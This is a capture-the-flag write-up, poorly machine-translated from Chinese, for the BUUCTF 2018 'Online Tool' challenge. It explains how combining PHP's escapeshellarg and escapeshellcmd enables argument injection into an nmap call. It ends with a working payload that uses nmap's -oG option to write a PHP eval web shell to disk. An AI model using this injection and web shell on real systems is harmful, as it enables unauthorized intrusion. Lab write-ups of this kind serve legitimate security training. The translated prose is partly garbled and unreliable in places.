Brief introduction
Reproduce the original question: https://github.com/glzjin/buuctf_2018_online_tool (environment php5.6.40)
Examine knowledge:escapeshellarg
and the escapeshellcmd
result of improper use rce
Online Platform: https://buuoj.cn (Beijing Union University public platform CTF) can be used within the interior of Yulin College Principal Association CTF training platform to find this title
process
Simple audit
Dog dish open the page to see the source code to see two functions do not know wp see it. . .
1 <?php 2 3 print_r($_SERVER['HTTP_X_FORWARDED_FOR']); 4 if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { 5 $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; 6 print("1"); 7 } 8 9 if(!isset($_GET['host'])) { 10 highlight_file(__FILE__); 11 } else { 12 $host = $_GET['host']; 13 $host = escapeshellarg($host); 14 $host = escapeshellcmd($host); 15 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); 16 echo 'you are in sandbox '.$sandbox; 17 @mkdir($sandbox); 18 chdir($sandbox); 19 echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 20 }
First learn to understand the function of two strangers
escapeshellcmd
escapeshellcmd - shell metacharacters escaped
escapeshellcmd () on a string of characters likely to deceive shell command to execute arbitrary commands escaped. This function guarantees that the user input data being sent to the exec () or system () function, or performing operator escape before.
Backslash (\) will be inserted before the following characters: & #; `| * ~ <> ^ () [] {} $ \? , \ X0A and \ xFF . ' And ' only escape when the mismatch children. On Windows platforms, as well as all these characters % and ! Characters are replaced by spaces.
<?php var_dump(escapeshellcmd("xiaohua da wang")); echo "<br>"; var_dump(escapeshellcmd("xiaohua 'da' wang")); echo "<br>"; var_dump(escapeshellcmd("xiaohua '''da' 'wang")); echo "<br>";
Result: only escaped single quotes in each occurrence
escapeshellarg
escapeshellarg - string transcode parameters can be used in shell command in
escapeshellarg () will increase in a single quote and string can cite any single quotes or transcoding already present, so that to ensure that the string passed to the shell directly to a function, and also to ensure safety. For some parameters entered by the user should use this function. shell functions comprising Exec () , System () execution operator .
<?php var_dump(escapeshellarg("xiaohua da wang")); echo '<br>'; var_dump(escapeshellarg("xiaohua 'da' wang")); echo '<br>'; var_dump(escapeshellarg("xiaohua '''da' wang")); echo '<br>';
Results: As long as it appears to be escaped single quotes
所以说escapeshellcmd
And the difference is that escapeshellarg, the former only have a single drop of single quotes to escape, while the latter will be all single quotes to escape, the former will escape some special characters such as:
& # ; ` | * ? ~ < > ^ ( ) [ ] { } $
<?php var_dump(escapeshellcmd("& # ; ` | * ? ~ < > ^ ( ) [ ] { } $")); echo "<br>";
Reference to learn: https: //paper.seebug.org/164/
Parameters are passed: 172.17.0.2 ' -v = -da. 1 After processed into a escapeshellarg '172.17.0.2' \ '' = -v -da. 1 ' , i.e., the first single quote escaping, and then left and right portions of the single quotation marks enclosed connected so as to function. After escapeshellcmd treatment becomes ' 172.17.0.2 '\\' ' -v -da = 1 \', because escapeshellcmd to \ and, finally, the unpaired children's quotes were escaped: http: //php.net /manual/zh/function.escapeshellcmd.php The last command executed is curl '172.17.0.2' \\ '' = -v -da. 1 \ ", because the intermediate is interpreted as \\ \ rather escape character behind 'is not escaped, and again later 'children become a blank mating connector. It can be reduced to curl 172.17.0.2 \ -v -da = 1 ' , ie 172.17.0.2 \ initiation request, POST data to a = 1'.
nmap parameters: https: //blog.csdn.net/qq_26090065/article/details/80285088
There is a parameter -oG can achieve the command and writes the results to a file in the nmap command
The final payload
This is our command input controllable! Then written to a file
?host=' <?php @eval($_POST["xiaohua"]);?> -oG xiaohua.php '
Displays the generated folder name we put together the next visit
http://6b6aa4fa-cc55-4b5d-8dd9-9ba66a236355.node3.buuoj.cn/4d484018dc3b664c4cc70a3ef2b8e7a3/xiaohua.php
Reference Learning: Online Tool (BUUCTF 2018)